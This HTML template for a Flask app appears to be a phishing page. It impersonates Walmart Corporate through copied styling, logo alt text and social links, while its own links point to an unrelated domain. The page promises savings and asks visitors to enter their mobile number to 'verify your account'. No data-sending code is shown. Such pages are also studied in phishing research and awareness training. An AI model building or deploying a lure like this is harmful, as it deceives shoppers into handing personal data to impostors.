<html class="ArticlePage Page gr__corporate_walmart_com wf-myriadprocondensed-n9-active wf-myriadprocondensed-n3-active wf-myriadprocondensed-n7-active wf-myriadprocondensed-n4-active wf-myriadpro-n4-active wf-myriadprocondensed-n6-active wf-myriadprocondensed-i7-active wf-myriadprocondensed-i4-active wf-myriadpro-i4-active wf-myriadpro-n3-active wf-myriadpro-n7-active wf-myriadpro-n9-active wf-myriadpro-i7-active wf-myriadpro-n6-active wf-active"
      itemscope="" itemtype="http://schema.org/WebPage" lang="en-US">
<head>
    <meta charset="UTF-8">


    <link href="https://fonts.googleapis.com/css?family=Amatic+SC:700" rel="stylesheet" type="text/css">
    <link href="{{ url_for('static', filename='css/AllNoFF.min.fc461fa68f05b8e8a0f481e78b614a0c.gz.css') }}"
          rel="stylesheet"
          type="text/css">
    <link href="{{ url_for('static', filename='css/FontFamilies.min.css') }}" rel="stylesheet" type="text/css">
    <link href="{{ url_for('static', filename='css/all.min.css') }}" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Alef&display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Barlow&display=swap" rel="stylesheet">


    <style data-theme-colors="">


  :root {
    /* general */
    --link-color: #1a75cf;
    --link-hover-color: #6cabe7;

    --underline-color: #6cabe7;
    --underline-hover-color: #6cabe7;
    --button-bg-color: #6cabe7;
    --button-bg-hover-color: #6cabe7;
    --button-color: #6cabe7;
    --icon-color: red;
    --icon-bg-color: red;
    --icon-hover-color: red;
    --icon-bg-hover-color: red;

    --mainThemeColor: #1a75cf;
    --mainThemeColorLighter: #6cabe7;
    --mainThemeColorDarker: #1c62be;

    --moduleThemeColor: #1a75cf;
    --mainHighlightColor: #ffb700;

    /* header */
    --navbar-bg-color: #0071ce;
    --navbar-bg-color-opacity: rgba(26,117,207,.6);
    --navbar-bg-hover-color: red;
    --navbar-item-hover-color: red;
    --tool-icon-color: white;
    --tool-icon-hover-color: white;
    --mobile-nav-menu-item-color: red;
    --mobile-nav-submenu-bg-color: red;
    --mobile-nav-submenu-separator-color: red;

    /* footer */
    --footer-link-color: white;
    --footer-link-hover-color: #6cabe7;
    --footer-bg-color: #1a75cf;
    --footer-sociallinks-color: white;
    --footer-sociallinks-hover-color: white;
    --footer-sociallinks-bg-color: #1a75cf;
    --footer-sociallinks-bg-hover-color: #1a75cf;








  }



    </style>


    <style>.EventPage-cta.EventPage-future,
.PromoEvent-addToCalendar {
 /*   display: none; */
}

@media only screen and (max-width: 768px) {
    .MainNavigation .NavigationLanguages, .MainNavigation .NavigationSites {
        display: none;
    }
}
@media only screen and (min-width: 768px) {
    .MediaObjectPage-main-image img {
        width: auto;
    }
}





    </style>

    <meta content="width=device-width, initial-scale=1" name="viewport">
    <title>Online to offline</title>


    <meta content="Online to offline" property="og:title">

    <meta content="https://basketgate.ai" property="og:url">
    <meta content="" property="og:image">


    <meta content="" property="og:image:url">

    <meta content="" property="og:image:width">
    <meta content="" property="og:image:height">
    <meta content="image" property="og:image:type">


    <meta content="Corporate - US" property="og:site_name">


    <meta content="article" property="og:type">


    <link href="/apple-touch-icon.png" rel="apple-touch-icon" sizes="180x180">
    <link href="https://basketgate.ai/favicon.ico" rel="icon" type="image/png">



</head>

<body class="ArticlePage-body" data-gr-c-s-loaded="true">


<header class="Header" data-bsp-plugin="Module23820" itemscope="" itemtype="http://schema.org/WPHeader">
    <div class="Header-contentWrapper" data-bsp-plugin="Module8751">

        <div class="Page-logo"><a data-cms-ai="0" href="https://basketgate.ai/">
            <img alt="Walmart Corporate Homepage"
                 class="PageLogo-image"
                 src="static/img/walmart-logo.svg">
        </a>
        </div>

    </div>
</header>
<!-- -->

<main class="Header-links">
    <article class="ArticlePage-mainContent" itemprop="mainEntity" itemscope="" itemtype="http://schema.org/Article">
        <div class="ArticlePage-lead">
            <div class="Page-logo">
                <h1 class="LedeBold-headline" itemprop="headline">Mobile verification</h1>
            </div>
        </div>

    </article>

    <article class="faq-tabbed-article">

<div>
        <h2 class="Youre-only-one-step">Save on your next shopping/order.</h2>
</div>

    </article>




    <div>
        <div class="ArticlePage-lead">
            <input class="input-phone-number" type="text">
        </div>
    </div>

    <article class="faq-tabbed-article">
        <h2 class="Youre-only-one-step">Please type your mobile number to verify your account.</h2>
    </article>

    <div style="margin-top:50;margin-bottom:30">
        <button type="submit" class="button">
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Continue&nbsp;&nbsp;&nbsp;<span style="font-size: 24px;color:white">&rarr;</span>
        </button>
    </div>

</main>


<!-- -->
<footer class="Page-footer" data-bsp-plugin="Module23820" itemscope="" itemtype="https://schema.org/WPFooter">
    <div class="Page-footer-iconLinks">

        <div class="Page-footerLogo"><a data-cms-ai="0" href="https://basketgate.ai/">
            <img alt="Walmart Corporate Homepage"
                 class="PageLogo-image"
                 height="40" src="static/img/walmart-logo.svg">
        </a>
        </div>


        <div class="Page-social">
            <div class="SocialBar">
                <h2 class="SocialBar-heading">Social</h2>

                <ul class="SocialBar-items">

                    <li class="SocialBar-items-item"><a class="SocialLink" data-cms-ai="0"
                                                        data-social-service="twitter" href="https://twitter.com/walmart"
                                                        target="_blank">walmart</a>
                    </li>

                    <li class="SocialBar-items-item"><a class="SocialLink" data-cms-ai="0"
                                                        data-social-service="instagram"
                                                        href="https://www.instagram.com/walmart/" target="_blank">walmart</a>
                    </li>

                    <li class="SocialBar-items-item"><a class="SocialLink" data-cms-ai="0"
                                                        data-social-service="youtube"
                                                        href="https://www.youtube.com/walmart"
                                                        target="_blank">walmart</a>
                    </li>

                    <li class="SocialBar-items-item"><a class="SocialLink" data-cms-ai="0"
                                                        data-social-service="pinterest"
                                                        href="https://www.pinterest.com/walmart"
                                                        target="_blank">walmart</a>
                    </li>

                    <li class="SocialBar-items-item"><a class="SocialLink" data-cms-ai="0"
                                                        data-social-service="facebook"
                                                        href="https://www.facebook.com/walmart"
                                                        target="_blank">walmart</a>
                    </li>

                </ul>

            </div>
        </div>


    </div>


</footer>


<span data-bsp-pv="4f8e492c-6f2f-390e-bc61-f176d3a37ab9"></span><span
        data-bsp-pv="00000150-24fd-d3e8-a7d3-24ff7b910000"></span>

</body>
</html>